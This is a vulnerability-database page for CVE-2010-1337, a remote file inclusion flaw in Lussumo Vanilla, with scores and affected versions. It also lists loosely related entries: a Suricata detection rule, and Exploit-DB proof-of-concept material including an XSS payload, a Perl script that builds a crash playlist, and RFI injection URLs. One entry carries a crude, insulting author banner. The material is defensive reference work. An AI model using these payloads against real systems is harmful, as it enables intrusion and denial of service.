CVE-2010-1337
published 2010-04-09CVE-2010-1337: Multiple PHP remote file inclusion vulnerabilities in definitions.php in Lussumo Vanilla 1.1.10, and possibly 0.9.2 and other versions, allow remote attackers…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.29%
81.1th percentile
Multiple PHP remote file inclusion vulnerabilities in definitions.php in Lussumo Vanilla 1.1.10, and possibly 0.9.2 and other versions, allow remote attackers to execute arbitrary PHP code via a URL in the (1) include and (2) Configuration['LANGUAGE'] parameters.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lussumo | vanilla | <= 1.1.10 | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
| lussumo | vanilla | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL SMTP EXPN overflow attempt
suricata·2010-09-23
CVE-2002-1337 GPL SMTP EXPN overflow attempt
GPL SMTP EXPN overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (msg:"GPL SMTP EXPN overflow attempt"; flow:established,to_server; content:"EXPN"; nocase; isdataat:255,relative; content:!"|0a|"; within:255; pcre:"/^EXPN[^\n]{255}/smi"; reference:bugtraq,6991; reference:bugtraq,7230; reference:cve,2002-1337; reference:cve,2003-0161; classtype:attempted-admin; sid:2102259; rev:10; metadata:created_at 2010_09_23, cve CVE_2002_1337, confidence Medium, signature_severity Major, updated_at 2024_03_08;)
Exploit-DB
OPEN IT OverLook 5 - 'title.php' Cross-Site Scripting
exploitdb·2010-10-08
CVE-2010-4792 OPEN IT OverLook 5 - 'title.php' Cross-Site Scripting
OPEN IT OverLook 5 - 'title.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/43872/info
OverLook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
OverLook 5.0 is vulnerable; prior versions may also be affected.
OverLook v5.0 Cross-site Scripting alert(/1337/) document.forms[0].submit();
Exploit-DB
Hanso Player 1.3.0 - '.m3u' Denial of Service
exploitdb·2010-10-03
Hanso Player 1.3.0 - '.m3u' Denial of Service
Hanso Player 1.3.0 - '.m3u' Denial of Service
---
# Exploit Title: Hanso Player Version 1.3.0 (.m3u) DoS
# Date: 10/02/2010
# Author: xsploited security
# Software Link: http://www.hansotools.com/downloads/hanso-player-setup.exe
# Version: 1.3.0
# Tested on: Windows XP Pro SP3
# CVE : N/A
#########################################################
#EAX 00000001
#ECX 80567B8E
#EDX EDD619A0
#EBX 003E320C ASCII "h "
#ESP 0103FF24
#EBP 0103FF58
#ESI 0103FF80
#EDI 001610D0
#EIP 7C90E460 ntdll.KiUserCallbackDispatcher
#Process terminated, exit code C0000409 (-1073740791.)
#########################################################
#!/usr/bin/perl
my $file = "crash.m3u";
my $junk = "\x41" x 1337;
open($FILE,">$file");
print $FILE $junk;
print "\ncrash.m3u file created successfully\n1.) Open it w
Exploit-DB
Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusions
exploitdb·2010-03-23
CVE-2010-1337 Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusions
Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusions
---
source: https://www.securityfocus.com/bid/38889/info
Vanilla is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Vanilla 1.1.10 and prior versions are vulnerable.
http://www.example.com/PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]
http://www.example.com/PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r]
Exploit-DB
Gnat-TGP 1.2.20 - Remote File Inclusion
exploitdb·2010-03-03
CVE-2010-1272 Gnat-TGP 1.2.20 - Remote File Inclusion
Gnat-TGP 1.2.20 - Remote File Inclusion
---
###############################################################
# Gnat-TGP <= 1.2.20 Remote File Include Vulnerability
# By cr4wl3r
# Download: http://www.komputer.boo.pl/download/skrypty/galerie/gnat-tgp.rar
# Gr33tz: EA ngel, Hmei7, zvtral, mywisdom and all my friend
###############################################################
###############################################################
# Fuck to buat loe tukang show off, dan buat loe yang mengaku dirinya hacker dan pamer sana-sini
# mengatakan orang lain lamer karena suka deface sedangkan dirinya adalah tukang deface
# you are 1337 lamer 1337 hoax and 1337 gay
# i'm injector and rooter in the site and i'm be silent
###############################################################
#######
No writeups or analysis indexed.
http://www.packetstormsecurity.com/1003-exploits/vanilla-rfi.txthttp://www.securityfocus.com/bid/38889https://exchange.xforce.ibmcloud.com/vulnerabilities/57147http://www.packetstormsecurity.com/1003-exploits/vanilla-rfi.txthttp://www.securityfocus.com/bid/38889https://exchange.xforce.ibmcloud.com/vulnerabilities/57147
2010-04-09
Published